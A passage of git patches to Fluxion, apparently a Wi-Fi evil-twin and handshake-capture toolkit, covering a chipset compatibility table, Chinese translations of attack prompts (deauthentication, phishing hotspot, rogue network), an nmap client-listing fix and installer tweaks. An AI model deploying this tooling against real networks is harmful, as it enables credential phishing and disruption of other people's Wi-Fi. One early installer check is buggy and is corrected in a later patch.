? + PCI/PCIe /CB + superseded by ath5k + (a)/b/(g) + + + Atheros + AR5513 +(Data Falcon) + none + + + + + + + + PCI/CB + somewhat relevant + (a)/b/g + + + Atheros + AR5005U (AR5523) + ar5523 + WEP, WPA, WPA2 + n + n + n + n + y + n + USB 2.0 + driver never completed, 5GHz mode non-functional? +ar5523 + (a)/b/g + + + Atheros + AR5005U (AR5523) + athusbwlan + WEP, WPA, WPA2 + y + ? + n + n + n + n + USB 2.0 + obsolete vendor driver + (a)/b/g + + + Atheros + AR9001U +(AR9170) + carl9170 + WEP, WPA, WPA2 + y + y + y + n + y + y + USB 2.0 + carl9170 + (a)/b/g/n + + + Atheros + AR600x + ar6k + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + SDIO + + (a)/b/g + + + Atheros + AR6003 + ath6kl + WEP, WPA, WPA2 + y + y + n + n + n + ? + SDIO + driver currently in staging +0271:0402 +ath6kl + a/b/g/n + + + Atheros + AR9374 + ath6kl + + + + + + + + USB 2.0 + 0cf3:9375 +ath6kl + (a)/b/g/n + + + Atheros + AR2427+AR5008 ++AR900x + ath9k + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/PCIe /CB + fcs check broken in monitor mode since ~2.6.33 +ath9k + (a)/b/g/(n) + + + Atheros + AR9002U +(AR9271, AR7010) + ath9k_htc + WEP, WPA, WPA2 + y + y + y + y + y + y + USB 2.0 + 0411:0197 +ath9k_htc + (a)/b/g/n + + + Qualcomm Atheros + QCA6164, QCA6174, +QCA9880 v2, QCA9882 v2 +QCA9890 v2, QCA9892 v2 + ath10k + WEP, WPA, WPA2 + y + y + y + n + y + y + PCIe + +3.11 (4.3) +168c:003e +168c:0041 +ath10k + a/b/g/n (+ac) + + + Qualcomm Atheros + Wilocity Wil6210 +802.11ad 60GHz + wil6210 + + + + + + + + PCIe + wil6210 + a/b/g/n (+ac+ad) + + + Qualcomm + WFB400 + none + + + + + + + + PCI/ PCIe/ CB/ USB 2.0 + unknown if released, +Airgo AGN400 + (a)/b/g/n + + + Atmel + + + + + + + + + + + + + + + Atmel + AT76C502A + atmel + WEP + y + ? + n + n + ? + n + PCMCIA + atmel cs + b + + + Atmel + AT76C503A, AT76C505(A) + at76c50x-usb + WEP + y + n + n + n + beacons + n + USB 1.0 + at76c50x-usb + b + + + Broadcom + + + + + + + + + + + + + + + Broadcom + BCM4301, BCM4307, BCM4306r2 + b43legacy + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/CB/ PCMCIA + ssb +b43legacy + b/(g) + + + Broadcom + BCM4306r3, BCM4311, BCM4312, BCM4309, BCM4318(E), BCM4321, BCM4322 + b43 + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/PCIe /CB + ssb, no HT mode support +b43 + (a)/b/g/(n) + + + Broadcom + BCM43224, BCM43225, BCM4331 + b43 + WEP, WPA, WPA2 + y + y + y + y + y + y + PCIe + bcma, no HT mode support, no current 5GHz support +b43 + (a)/b/g/n + + + Broadcom + BCM4311, BCM4313, BCM4321, BCM4322, BCM4322x, BCM43225, BCM43227, BCM43228 + wl + WEP, WPA, WPA2 + y + y + n + n + n + n + PCIe + vendor driver +wl + (a)/b/g/(n) + + + Broadcom + BCM4320 and other +rndis variants + rndis_wlan + + y + y + n + n + n + n + USB 2.0 + rndis wlan + b/g + + + Broadcom + BCM4323x + none + + + + + + + + USB 2.0 + possible future support w/ brcmfmac? (probably not) + (a)/b/g/n + + + Broadcom + BCM43235, BCM43236, BCM43238 +(chip revision dependent) + brcmfmac + y + ? + ? + ? + ? + n + n + USB 2.0 + patch adding support recently added +brcmfmac + (a)/b/g/n + + + Broadcom + BCM4326U + none + + + + + + + + USB 2.0 + + b/g + + + Broadcom + BCM4329 + brcmfmac + WEP, WPA, WPA2 + y + ? + ? + ? + n + n + SDIO + brcmfmac + a/b/g/n + + + Broadcom + BCM43224, BCM43225 + brcmsmac + WEP, WPA, WPA2 + y + ? + ? + ? + y + ? + PCIe + BCMA +brcmsmac + (a)/b/g/n + + + Conexant + + + + + + + + + + + + + + + Conexant + CX53111 + none + + + + + + + + SDIO + + b/g + + + Conexant + CX53822 + none + + + + + + + + CF + + (a)/b/g + + + Envara + WiND502/512 + none + + + + + + + + USB 2.0 + WiND512 (b/g) devices common + (a)/b/g + + + Inprocomm + IPN2120, IPN2220 + none + ? + + + + + + + PCI/CB + + b/(g) + + + Inprocomm + IPN2128 + none + ? + + + + + + + SDIO + + b + + + Intel + + + + + + + + + + + + + + + Intel + PRO/Wireless 2100B + ipw2100 + ? + y + y + n + n + y + ? + PCI + ipw2100 + b + + + Intel + PRO/Wireless 2200BG, 2915ABG + ipw2200 + WEP, WPA, WPA2 + y + y + oot + n + ? + ? + PCI + ipw2200 + (a)/b/g + + + Intel + PRO/Wireless 3945ABG + iwl3945 + WEP, WPA, WPA2 + y + y + n + n + y + y + PCI + iwl3945 + a/b/g + + + Intel + Wireless WiFi Link 4965AGN + iwl4965 + WEP, WPA, WPA2 + y + y + n + n + y + y + PCI + iwl4965 + a/b/g/n + + + Intel + WiFi Link 5100, 5150, 5300, 5350 - Centrino 100, 130, 1000, 1030, 6150, 6200, 6250, 6300 + iwlagn + WEP, WPA, WPA2 + y + y + n + n + y + y + PCI + iwlagn +iwlwifi + (a)/b/g/n + + + Intel + IWMC3200 (Evans Peak) + iwmc3200 + WEP, WPA, WPA2 + y + y + n + n + n + n + SDIO + iwmc3200 + a/b/g + + + Intersil + + + + + + + + + + + + + + + Intersil + PRISM 2/2.5/3 +PCI/CF/PCMCIA + hostap + ? + y + ? + y + n + y + y + PCI/CB /USB + hostap + b + + + Intersil + PRISM 2.5/3 USB + prism2_usb + WEP + y + ? + n + n + y + b + PCI/CB /USB + staging driver from linux-wlan-ng +prism2 usb + b + + + Intersil + ISL3877, ISL3880, +ISL3890, ISL3886 + p54pci + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/CB + p54pci + (a)/b/g + + + Intersil + ISL3880/ISL3886 ++ NET2280, ISL3887 + p54usb + WEP, WPA, WPA2 + y + y + y + y + y + y + USB 2.0 + p54usb + (a)/b/g + + + Lucent + HERMES I (WaveLAN +/IEEE/ORiNOCO) + orinoco + WEP, WPA-TKIP + y + y + n + n + y + oot + PCI/ PCMCIA/ USB 1.0 + no Bronze support +orinoco +orinoco usb + b + + + Marvell + + + + + + + + + + + + + + + Marvell +(Libertas) + 88W8310 + none + + + + + + + + PCI/CB + + b/g + + + Marvell +(Libertas) + 88W8335 + mrv8k + + + + + + + + PCI/CB + mrv8k + b/g + + + Marvell +(Libertas) + 88W8338 + none + + + + + + + + USB 2.0 + + b/g + + + Marvell +(Libertas) + 88W8385, +88W8388, 88W8686 + libertas + ? + y + y + n + n + n + n + USB/CF /SDIO + libertas + b/g + + + Marvell +(Libertas) + 88W8388 + libertas_tf + ? + y + n + y + ? + ? + ? + USB/CF /SDIO + OLPC XO-1, +supports mesh + b/g + + + Marvell +(TopDog) + 88W8360, 88W8361, +88W8362 (USB), +88W8362E, 88W8363 + none + + + + + + + + PCI/PCIe/ CB/USB2.0 + + (a)/b/g/n + + + Marvell +(TopDog/ +Avastar*) + 88W8366, 88W8863, +88W8687, 88W8764* + mwl8k + ? + y + ? + y + ? + y + ? + PCIe + mwl8k + (a)/b/g/n + + + Marvell +(Avastar) + 88W8797 (88W8786U) + mwifiex + ? + ? + ? + ? + ? + ? + ? + USB + 1286:2049 +mwifiex + a/b/g/n + + + Marvell +(Avastar) + 88W8786, 88W8787, +88W8797, 88W8897* + mwifiex + ? + ? + ? + ? + ? + ? + ? + SDIO + 02df:9139 +mwifiex + a/b/g/n (+ac)* + + + Marvell +(Avastar) + 88W8766, 88W8897* + mwifiex + ? + ? + ? + ? + ? + ? + ? + PCIe + 11ab:2b38 +mwifiex + a/b/g/n (+ac)* + + + Marvell +(Avastar) AC* + 88W8864*, 88W8897* + mwlwifi + ? + ? + ? + ? + ? + ? + ? + PCIe + iwlwifi +WRT1900 +iwlwifi + a/b/g/n (+ac)* + + + Marvell + unknown + mrvl_cb82 + + + + + + + + + + + + + MediaTek + + + + + + + + + + + + + + + MediaTek + MT5911N + none + + + + + + + + SDIO + + b/g + + + MediaTek + MT7601U + mt7601u + + + + + + + + USB + vendor driver + a/b/g/n + + + MediaTek + MT7610U + mt7601u + + + + + + + + USB + vendor driver + a/b/g/n (+ac)* + + + Metalink + MtW817x + none + + + + + + + + PCI + + a/(b)/(g)/n + + + No Wires Needed + Swallow + swallow_cs + WEP + y + ? + n + n + n + n + PCMCIA + obsolete out of kernel driver + b + + + No Wires Needed + Poldhu + poldhu + WEP + y + y + n + n + n + n + PCMCIA + obsolete out of kernel driver +poldhu cs + b + + + Ralink + + + + + + + + + + + + + + + Ralink + RT2460 + rt2400pci + ? + y + y + y + n + y + y + PCI/CB + + b + + + Ralink + RT2560 + rt2500pci + WEP, WPA, WPA2 + y + y + y + n + y + y + PCI/CB + + (a)/b/g + + + Ralink + RT2561, RT2561S, RT2661 + rt61pci + WEP, WPA, WPA2 + y + y + y + n + y + y + PCI/CB + + (a)/b/g + + + Ralink + RT2571, RT2572 + rt2500usb + WEP, WPA, WPA2 + y + y + y + n + y + y + USB 2.0 + + (a)/b/g + + + Ralink + RT2571W, RT2573, RT2671 + rt73usb + WEP, WPA, WPA2 + y + y + y + n + y + y + USB 2.0 + + (a)/b/g + + + Ralink + RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT3090, RT3091, RT3092, RT3390, RT3060, RT3062, RT3562, RT3592, RT5390, RT3290 + rt2800pci + WEP, WPA, WPA2 + y + ? + y + ? + y + y + PCI/PCIe /CB + Wiki + (a)/b/g/n + + + Ralink + RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT309x + rt2860sta + WEP, WPA, WPA2 + y + ? + y + ? + y + n + PCI/PCIe /CB + vendor driver + (a)/b/g/n + + + Ralink + RT2770, RT2870, RT2070, RT3070, RT3071, RT3072, RT3370, RT3572, RT5370, RT5572, RT8070 + rt2800usb + WEP, WPA, WPA2 + y + y + y + y (??) + y + y + USB 2.0 + Wiki + (a)b/g/(n) + + + Ralink + RT2770, RT2870, RT2070, RT307x + rt2870sta + WEP, WPA, WPA2 + y + ? + ? + n + n + n + USB 2.0 + vendor driver + (a)/b/g/(n) + + + Ralink + RT3572 + rt3572sta + WEP, WPA, WPA2 + y + ? + ? + ? + n + n + USB 2.0 + + a/b/g/n + + + Ralink + RT3573 + none + + + + + + + + USB 2.0 + three stream + a/b/g/n + + + Realtek + + + + + + + + + + + + + + + Realtek + RTL8180L, RTL8185L, +RTL8187SE (3.15+) + rtl8180 + WEP, WPA, WPA2 + y + n + n + n + y + ? + PCI/CB + + b/(g) + + + Realtek + RTL8187L, RTL8187B + rtl8187 + WEP, WPA, WPA2 + y + n + n + n + y + y + USB 2.0 + + b/g + + + Realtek + RTL8187SE + rtl8187se + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + PCI + + b/g + + + Realtek + RTL8190 + r8190_pci + ? + ? + ? + ? + ? + ? + ? + PCI +/ CB + vendor driver + b/g/n + + + Realtek + RTL8192E + r8192e_pci + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + PCIe + staging (vendor) driver + (a)/b/g/n + + + Realtek + RTL8191SE, RTL8192SE + rtl8192se + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + PCIe + + b/g/n + + + Realtek + RTL8192U + r8192u_usb + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + USB 2.0 + staging (vendor) driver + b/g/n + + + Realtek + RTL8188SU, RTL8191SU, RTL8192SU + r8712u + WEP, WPA, WPA2 + y + ? + ? + ? + ? + n + USB 2.0 + staging (vendor) driver + b/g/n + + + Realtek + RTL8188SU, RTL8191SU, RTL8192SU + r8192s_usb + WEP, WPA, WPA2 + y + ? + ? + ? + y + ? + USB 2.0 + staging (vendor) driver, superseded by r8712u + b/g/n + + + Realtek + RTL8188CE, RTL8192CE + rtl8192ce + WEP, WPA, WPA2 + y + ? + ? + ? + ? + n + PCIe + + b/g/n + + + Realtek + RTL8188CUS, RTL8192CU, RTL8188RU + rtl8192cu + WEP, WPA, WPA2 + y + y + n + ? + y + n + USB 2.0 + + b/g/n + + + Realtek + RTL8192DU + rtl8192du + WEP, WPA, WPA2 + y + ? + ? + ? + ? + ? + USB 2.0 + driver available here, may panic on init on some kernels + a/b/g/n + + + Realtek + RTL8192DE + rtl8192de + WEP, WPA, WPA2 + y + ? + ? + ? + ? + n + PCIe + + a/b/g/n + + + Renesas + + + + + + + + + + + + + + + Renesas + KS7010 + ks7010 + ? + ? + ? + ? + ? + ? + ? + SDIO + from Javi Roman + b + + + ShareWave / Cirrus Logic + Bodega + none + + + + + + + + PCI/ PCMCIA/ USB 1.0 + rare devices, support the proprietary Whitecap protocol + b + + + SiS + 160 + sis160 + ? + y + ? + n + n + n + n + PCI + rare devices, driver is a useless binary blob + b + + + SiS + 162, 162U + sis162 + ? + y + y + n + n + n + n + PCI/ USB 2.0 + driver is a useless binary blob + b + + + SiS + 163, 163U + none + + + + + + + + PCI/CF/ USB 2.0 + + b/g + + + ST-Ericsson + CW1100, CW1200 + cw1200 + + + + + + + + SDIO +/ PCI + (since 3.11) + b/g + + + ST-NXP + STLC4560 + p54spi + WEP, WPA, WPA2 + y + y + y + y + y + y + SPI + + b/g + + + Symbol + Spectrum24 DS + orinoco + WEP + y + ? + n + n + y + n + PCI/ PCMCIA + orinoco + b + + + Syntek/3DSP + unknown +(Bluew-2310x) + none + ? + + + + + + + PCI + compiled modules available + b/g + + + Syntek/3DSP + STK9100+STK9230 +(Bluew-2310u) + 3dspusbwlan + ? + + + + + + + USB 2.0 + partial source? + b/g + + + Texas Instruments + + + + + + + + + + + + + + + Texas Instruments + ACX100 (TNETW1100), ACX101 (TNETW1100B), ACX111 (TNETW1130), TNETW1450 + acx1xx + WEP, WPA, WPA2 + y + ? + n + n + y + ? + PCI/CB /USB + acx100 +acx + b/(g) + + + Texas Instruments + WL1251 + wl1251 + WEP, WPA, WPA2 + y + y + n + ? + y + ? + SPI/ SDIO + + b/g + + + Texas Instruments + WL1271 + wl1271 + WEP, WPA, WPA2 + y + y + y + n + n + n + SPI/ SDIO + + (a)/b/g/n + + + VIA + VT6551 + none + ? + ? + ? + ? + ? + ? + ? + PCI + + b + + + VIA + VT6555 + vt6655 + ? + y + ? + ? + ? + ? + n + PCI + staging (vendor) driver +vt6656 + (a)/b/g + + + VIA + VT6556 + vt6656 + ? + y + ? + ? + ? + ? + n + PCI + staging (vendor) driver +vt6656 + (a)/b/g + + + WavePlus + WP1200 + none + + + + + + + + PCI/ PCMCIA + devices not common + b + + + Winbond + W89C33D + none + + + + + + + + PCI + devices not common + b/g + + + Winbond + W89C35D + winbond + ? + y + ? + n + n + n + n + USB 2.0 + staging (vendor) driver only supports 'b' +w35und + b/g + + + ZyDAS + + + + + + + + + + + + + + + ZyDAS + ZD1201 + zd1201 + WEP + y + ? + ? + ? + y + ? + USB 1.0 + zd1201 + b + + + ZyDAS + ZD1201 + zdsta + WEP + y + ? + ? + ? + ? + n + USB 1.0 + obsolete vendor driver + b + + + ZyDAS + ZD1201 + zdsta + WEP + y + ? + ? + ? + ? + n + PCMCIA + obsolete vendor driver, devices not common + b + + + ZyDAS + ZD1202 + zdsta + WEP + + + + + + n + PCI/CB/ PCMCIA + obsolete vendor driver, devices not common + b + + + ZyDAS + ZD1211/ZD1211B + zd1211rw + WEP, WPA, WPA2 + y + y + y + y + y + y + USB 1.0 + 5GHz band not supported, no hw crypto +zd1211rw + (a)/b/g + + + ZyDAS + ZD1212/ZD1212B + zd1212 + WEP, WPA, WPA2 + y + y + y + + + n + PCI/CB + obsolete vendor driver, devices not common + (a)/b/g + + + Manufacturer + Chipset + Driver + Station + Ad-hoc + AP + Monitor + Bus + Notes + + + + PHY Modes + + + Aironet + ARLAN + arlan + ? + ? + ? + ? + ISA + driver abandoned + + + + pre-b (900MHz or 2.4GHz) + + + Lucent + WaveLAN + wavelan + ? + ? + ? + ? + PCMCIA/ISA + driver abandoned + + + + pre-b (900MHz or 2.4GHz) + + + Raytheon + Raylink + ray_cs + ? + ? + ? + ? + PCMCIA + USB variants not supported + + + + 2.4GHz FHSS + + + ShareWave + chipset before +Bodega (Epic?) + none + + + + + PCI/PCMCIA + uncommon devices + + + + Whitecap + + + Symbol + Spectrum24 FHSS + none + + + + + PCMCIA + + + + + 2.4GHz FHSS + + + Xircom + Netwave + netwave_cs + ? + ? + ? + ? + PCMCIA + driver abandoned + + + + pre-b, 1Mb + + + AMD + Am79C930 +(presumably) + wl3501_cs + ? + ? + ? + ? + PCMCIA + PRISM I based RF + + + + 2Mb, pre-802.11b + + \ No newline at end of file From 1868dec6e7b8d16c07d0ee3d83c479404987864a Mon Sep 17 00:00:00 2001 From: xihi <29686769+xisohi@users.noreply.github.com> Date: Sat, 7 Apr 2018 14:16:51 +0800 Subject: [PATCH 09/18] Update zh.sh --- attacks/Handshake Snooper/language/zh.sh | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/attacks/Handshake Snooper/language/zh.sh b/attacks/Handshake Snooper/language/zh.sh index bf5c14f..000c2e9 100755 --- a/attacks/Handshake Snooper/language/zh.sh +++ b/attacks/Handshake Snooper/language/zh.sh @@ -8,14 +8,14 @@ HandshakeSnooperMonitorMethodOption="监听模式 (${CYel}被动$CClr)" HandshakeSnooperAireplayMethodOption="aireplay-ng 解除认证方式 (${CRed}侵略性$CClr)" HandshakeSnooperMdk3MethodOption="mdk3 解除认证方式 (${CRed}侵略性$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -HandshakeSnooperVerifierIntervalQuery="How often should the verifier check for a handshake?" -HandshakeSnooperVerifierInterval30SOption="Every 30 seconds (${CGrn}recommended${CClr})." -HandshakeSnooperVerifierInterval60SOption="Every 60 seconds." -HandshakeSnooperVerifierInterval90SOption="Every 90 seconds." +HandshakeSnooperVerifierIntervalQuery="每隔多久检查一次握手包" +HandshakeSnooperVerifierInterval30SOption="每30秒钟 (${CGrn}推荐${CClr})." +HandshakeSnooperVerifierInterval60SOption="每60秒钟" +HandshakeSnooperVerifierInterval90SOption="每90秒钟" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperVerifierSynchronicityQuery="How should verification occur?" HandshakeSnooperVerifierSynchronicityAsynchronousOption="Asynchronously (${CYel}fast systems only${CClr})." -HandshakeSnooperVerifierSynchronicitySynchronousOption="Synchronously (${CGrn}recommended${CClr})." +HandshakeSnooperVerifierSynchronicitySynchronousOption="Synchronously (${CGrn}推荐${CClr})." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperStartingArbiterNotice="${CCyn}Handshake Snooper$CClr arbiter daemon running." HandshakeSnooperSnoopingForNSecondsNotice="Snooping for \$HANDSHAKEVerifierInterval seconds." From eebaeb59d53ea3990f7d2292f825d63e214cfacd Mon Sep 17 00:00:00 2001 From: xihi <29686769+xisohi@users.noreply.github.com> Date: Sat, 7 Apr 2018 14:21:04 +0800 Subject: [PATCH 10/18] Update zh.sh --- attacks/Captive Portal/language/zh.sh | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/attacks/Captive Portal/language/zh.sh b/attacks/Captive Portal/language/zh.sh index bf6d587..dceeff1 100755 --- a/attacks/Captive Portal/language/zh.sh +++ b/attacks/Captive Portal/language/zh.sh @@ -3,10 +3,10 @@ # description: 创建一个“邪恶的双胞胎”接入点。 # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -CaptivePortalInterfaceQuery="Select an interface for the captive portal." -CaptivePortalStartingInterfaceNotice="Starting captive portal interface..." -CaptivePortalCannotStartInterfaceError="${CRed}Unable to start captive portal interface$CClr, returning!" -CaptivePortalStartedInterfaceNotice="${CGrn}Success${CClr}, captive portal interface ready!" +CaptivePortalInterfaceQuery="为捕获的握手包文件选择一个网络功击接口" +CaptivePortalStartingInterfaceNotice="启动握手包文件网络功击接口" +CaptivePortalCannotStartInterfaceError="${CRed}无法启动网络功击接口$CClr, 返回" +CaptivePortalStartedInterfaceNotice="${CGrn}启动成功${CClr},网络功击接口准备就绪" CaptivePortalStaringAPServiceNotice="开始建立钓鱼热点AP..." CaptivePortalStaringAPRoutesNotice="启动钓鱼热点AP路由服务..." CaptivePortalStartingDHCPServiceNotice="启动接入点DHCP服务作为守护进程..." @@ -24,9 +24,9 @@ CaptivePortalCertificateSourceDisabledOption="None (${CYel}disable SSL$CGry)" CaptivePortalUIQuery="选择钓鱼热点的认证网页界面" CaptivePortalGenericInterfaceOption="通用认证网页" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -CaptivePortalConnectivityQuery="Select an internet connectivity type for the rogue network." -CaptivePortalConnectivityDisconnectedOption="disconnected (${CGrn}recommended$CClr)" -CaptivePortalConnectivityEmulatedOption="emulated" +CaptivePortalConnectivityQuery="为流氓网络选择Internet连接类型" +CaptivePortalConnectivityDisconnectedOption="断开原网络 (${CGrn}推荐$CClr)" +CaptivePortalConnectivityEmulatedOption="仿真" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # FLUXSCRIPT END From 7e60d44ccc6e3b7d6a6f2c9307adbfdffaa6c2d7 Mon Sep 17 00:00:00 2001 From: xihi <29686769+xisohi@users.noreply.github.com> Date: Sat, 7 Apr 2018 14:26:45 +0800 Subject: [PATCH 11/18] Update zh.sh --- language/zh.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/language/zh.sh b/language/zh.sh index ba2fef4..5ffbabe 100755 --- a/language/zh.sh +++ b/language/zh.sh @@ -10,18 +10,18 @@ FLUXIONFindingWINotice="寻找可用的USB外部网卡接口设备..." FLUXIONSelectedBusyWIError="选择的USB外部网卡接口设备正在被调用!" FLUXIONSelectedBusyWITip="Run \"export FLUXIONWIKillProcesses=1\" before FLUXION to use it." FLUXIONGatheringWIInfoNotice="采集接口信息..." -FLUXIONUnknownWIDriverError="Unable to determine interface driver!" +FLUXIONUnknownWIDriverError="找不到网卡设备" FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to unload..." FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to load..." FLUXIONFindingConflictingProcessesNotice="自动查询干扰Fluxion运行的进程..." FLUXIONKillingConflictingProcessesNotice="结束干扰Fluxion运行的进程..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Unable to determine interface's physical device!" FLUXIONStartingWIMonitorNotice="启动监听模式..." -FLUXIONMonitorModeWIEnabledNotice="${CGrn}Interface monitor mode enabled." -FLUXIONMonitorModeWIFailedError="${CRed}Interface monitor mode failed!" +FLUXIONMonitorModeWIEnabledNotice="${CGrn}监听模式启动成功" +FLUXIONMonitorModeWIFailedError="${CRed}监听模式启动失败" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="启动扫描, 请稍等..." -FLUXIONStartingScannerTip="目标ap出现五秒后, 关闭FLUXION扫描" +FLUXIONStartingScannerTip="目标AP出现后,按 Ctrl+C 关闭FLUXION扫描" FLUXIONPreparingScannerResultsNotice="综合扫描的结果获取中,请稍等..." FLUXIONScannerFailedNotice="你的无线网卡好像不支持 (没有发现APs)" FLUXIONScannerDetectedNothingNotice="没有发现访问点, 请返回重试..." From 03092e9aee4a5492c1817beaabe71120cd21dc52 Mon Sep 17 00:00:00 2001 From: rad4day Date: Tue, 10 Apr 2018 23:16:18 +0200 Subject: [PATCH 12/18] Update ISSUE_TEMPLATE.md Updated the hint about html comments. --- .github/ISSUE_TEMPLATE.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md index 1a15646..b0904fe 100644 --- a/.github/ISSUE_TEMPLATE.md +++ b/.github/ISSUE_TEMPLATE.md @@ -2,7 +2,7 @@ #### Read the [wiki](https://github.com/FluxionNetwork/fluxion/wiki)? No* From 141f1b934339b88d2d53475b46705f2e32b0a1b4 Mon Sep 17 00:00:00 2001 From: djmeero <38168554+djmeero@users.noreply.github.com> Date: Sat, 21 Apr 2018 21:25:52 +0300 Subject: [PATCH 13/18] Update attack.sh Changing line 872 and using readarray will resolve "Clients online" not appearing issue. --- attacks/Captive Portal/attack.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index e859175..eb10938 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -869,7 +869,7 @@ while [ \$AuthenticatorState = \"running\" ]; do local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g") echo " - DHCPClients=($(nmap -PR -sn -n -oG - $CaptivePortalGatewayNetwork.100-110 2>&1 | grep Host)) + readarray -t DHCPClients < <(nmap -PR -sn -n -oG - $CaptivePortalGatewayNetwork.100-110 2>&1 | grep Host) echo echo -e \" ACCESS POINT:\" From 78672b0e31dc18cde03c645a2038627164dff246 Mon Sep 17 00:00:00 2001 From: deltax Date: Sun, 22 Apr 2018 10:42:44 +0200 Subject: [PATCH 14/18] Add internet connection check --- lib/installer/InstallerUtils.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/installer/InstallerUtils.sh b/lib/installer/InstallerUtils.sh index ea75886..4b5f972 100755 --- a/lib/installer/InstallerUtils.sh +++ b/lib/installer/InstallerUtils.sh @@ -190,6 +190,7 @@ function installer_utils_check_dependencies() { # Parameters: $1 - CLI Tools missing array (will be installed) $2 - substitutes array function installer_utils_run_dependencies() { if [ ! "$1" ]; then return 1; fi + ping -q -w 1 -c 8.8.8.8 > /dev/null || echo -e "\n[!] No internet connection found"; exit 1 # The array below holds all the packages that will be installed. local __installer_utils_run_dependencies__dependenciesInfo=("${!1}") From 20f737ef970a6732fbec5992effe8d9d78168420 Mon Sep 17 00:00:00 2001 From: deltax Date: Sun, 22 Apr 2018 13:09:34 +0200 Subject: [PATCH 15/18] Disable error messages --- lib/installer/InstallerUtils.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/installer/InstallerUtils.sh b/lib/installer/InstallerUtils.sh index 4b5f972..ad39a84 100755 --- a/lib/installer/InstallerUtils.sh +++ b/lib/installer/InstallerUtils.sh @@ -190,7 +190,7 @@ function installer_utils_check_dependencies() { # Parameters: $1 - CLI Tools missing array (will be installed) $2 - substitutes array function installer_utils_run_dependencies() { if [ ! "$1" ]; then return 1; fi - ping -q -w 1 -c 8.8.8.8 > /dev/null || echo -e "\n[!] No internet connection found"; exit 1 + ping -q -w 1 -c 8.8.8.8 2> /dev/null || echo -e "\n[!] No internet connection found"; exit 1 # The array below holds all the packages that will be installed. local __installer_utils_run_dependencies__dependenciesInfo=("${!1}") From 940ed0653ac46c5c22ee1e47b0add8988efe5838 Mon Sep 17 00:00:00 2001 From: deltaxflux Date: Sun, 22 Apr 2018 13:21:49 +0200 Subject: [PATCH 16/18] Minor changes: Change debug function --- fluxion.sh | 7 +- lib/installer/InstallerUtils.sh | 2 +- misc/devices.json | 4172 ++++++++++++++--------------- misc/devices.xml | 4326 +++++++++++++++---------------- 4 files changed, 4254 insertions(+), 4253 deletions(-) diff --git a/fluxion.sh b/fluxion.sh index 685b9d2..e422c9a 100755 --- a/fluxion.sh +++ b/fluxion.sh @@ -23,7 +23,7 @@ readonly FLUXIONNoiseFloor=-90 readonly FLUXIONNoiseCeiling=-60 readonly FLUXIONVersion=4 -readonly FLUXIONRevision=4 +readonly FLUXIONRevision=5 # Declare window ration bigger = smaller windows FLUXIONWindowRatio=4 @@ -164,7 +164,8 @@ fi # FLUXIONDebug [Normal Mode "" / Developer Mode 1] if [ $FLUXIONDebug ]; then - readonly FLUXIONOutputDevice="/dev/stdout" + touch /tmp/fluxion_debug_log + readonly FLUXIONOutputDevice="/tmp/fluxion_debug_log" readonly FLUXIONHoldXterm="-hold" else readonly FLUXIONOutputDevice="/dev/null" @@ -190,7 +191,7 @@ readonly InstallerUtilsNoticeMark="$FLUXIONVLine" readonly PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" -declare IOUtilsHeader="fluxion_header" +declare IOUtilsHeader="fluxion_header" readonly IOUtilsQueryMark="$FLUXIONVLine" readonly IOUtilsPrompt="$FLUXIONPrompt" diff --git a/lib/installer/InstallerUtils.sh b/lib/installer/InstallerUtils.sh index ad39a84..19883bd 100755 --- a/lib/installer/InstallerUtils.sh +++ b/lib/installer/InstallerUtils.sh @@ -190,7 +190,7 @@ function installer_utils_check_dependencies() { # Parameters: $1 - CLI Tools missing array (will be installed) $2 - substitutes array function installer_utils_run_dependencies() { if [ ! "$1" ]; then return 1; fi - ping -q -w 1 -c 8.8.8.8 2> /dev/null || echo -e "\n[!] No internet connection found"; exit 1 + ping -q -w 1 -c 1 8.8.8.8 > /dev/null || $(echo -e "\n[!] No internet connection found"; exit 1) # The array below holds all the packages that will be installed. local 